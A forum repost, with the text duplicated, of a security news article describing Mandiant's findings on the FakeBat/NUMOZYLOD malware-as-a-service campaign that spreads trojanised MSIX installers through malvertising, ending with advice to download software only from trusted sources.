Friend
Professional
- Messages
- 2,653
- Reaction score
- 850
- Points
- 113
Installing just one app will completely deprive you of your privacy.
Cybersecurity researchers have recorded a sharp increase in infections associated with a malware distribution campaign that uses a downloader called NUMOZYLOD.
According to Mandiant's cyber experts, these attacks are opportunistic in nature and target users looking for popular business software. The infection occurs through a Trojan MSIX installer that runs a PowerShell script to download secondary malicious code.
NUMOZYLOD, also known as FakeBat, EugenLoader, and PaykLoader, is associated with a cyber group called Eugenfest. Mandiant specialists attribute the malware to the Malware-as-a-Service (MaaS) operation, an organized UNC4536 group.
The infection chain begins with drive-by methods, when users try to download popular software and are taken to fake sites offering infected MSI installers. Among the malware distributed through FakeBat are well-known samples such as IcedID, RedLine Stealer, Lumma Stealer, SectopRAT, and Carbanak, the latter of which is associated with the FIN7 group.
The UNC4536 group uses a technique known as "malvertising" to distribute Trojan MSIX installers disguised as popular programs such as Brave, KeePass, Notion, Steam, and Zoom. These installers are hosted on fake sites that mimic legitimate resources, which tricks users into downloading infected versions.
A feature of the attacks is the use of MSIX installers, which can execute the script before the main application is launched thanks to the startScript configuration. This makes the attacks especially dangerous because the malware starts its work even before the program itself is installed.
UNC4536 actually performs the role of malware distributor, using FakeBat as a transport to deliver the next stage of infection. This malware is reported to collect system information, including data about the operating system, domain affiliation, and installed antiviruses.
Some embodiments also collect the public IP addresses of the host and send them to the C&C server. And to maintain presence in the system, a shortcut is created in the startup folder.
The malware campaign reviewed by Mandiant highlights the importance of caution when downloading software from the Internet, especially from unknown or suspicious sites.
Even the most popular programs can become bait for cybercriminals using sophisticated methods such as Trojan installers to infiltrate the system. Only attentiveness and the use of trusted sources for downloading will help minimize the risks of infection and data loss.
Source
Cybersecurity researchers have recorded a sharp increase in infections associated with a malware distribution campaign that uses a downloader called NUMOZYLOD.
According to Mandiant's cyber experts, these attacks are opportunistic in nature and target users looking for popular business software. The infection occurs through a Trojan MSIX installer that runs a PowerShell script to download secondary malicious code.
NUMOZYLOD, also known as FakeBat, EugenLoader, and PaykLoader, is associated with a cyber group called Eugenfest. Mandiant specialists attribute the malware to the Malware-as-a-Service (MaaS) operation, an organized UNC4536 group.
The infection chain begins with drive-by methods, when users try to download popular software and are taken to fake sites offering infected MSI installers. Among the malware distributed through FakeBat are well-known samples such as IcedID, RedLine Stealer, Lumma Stealer, SectopRAT, and Carbanak, the latter of which is associated with the FIN7 group.
The UNC4536 group uses a technique known as "malvertising" to distribute Trojan MSIX installers disguised as popular programs such as Brave, KeePass, Notion, Steam, and Zoom. These installers are hosted on fake sites that mimic legitimate resources, which tricks users into downloading infected versions.
A feature of the attacks is the use of MSIX installers, which can execute the script before the main application is launched thanks to the startScript configuration. This makes the attacks especially dangerous because the malware starts its work even before the program itself is installed.
UNC4536 actually performs the role of malware distributor, using FakeBat as a transport to deliver the next stage of infection. This malware is reported to collect system information, including data about the operating system, domain affiliation, and installed antiviruses.
Some embodiments also collect the public IP addresses of the host and send them to the C&C server. And to maintain presence in the system, a shortcut is created in the startup folder.
The malware campaign reviewed by Mandiant highlights the importance of caution when downloading software from the Internet, especially from unknown or suspicious sites.
Even the most popular programs can become bait for cybercriminals using sophisticated methods such as Trojan installers to infiltrate the system. Only attentiveness and the use of trusted sources for downloading will help minimize the risks of infection and data loss.
Source
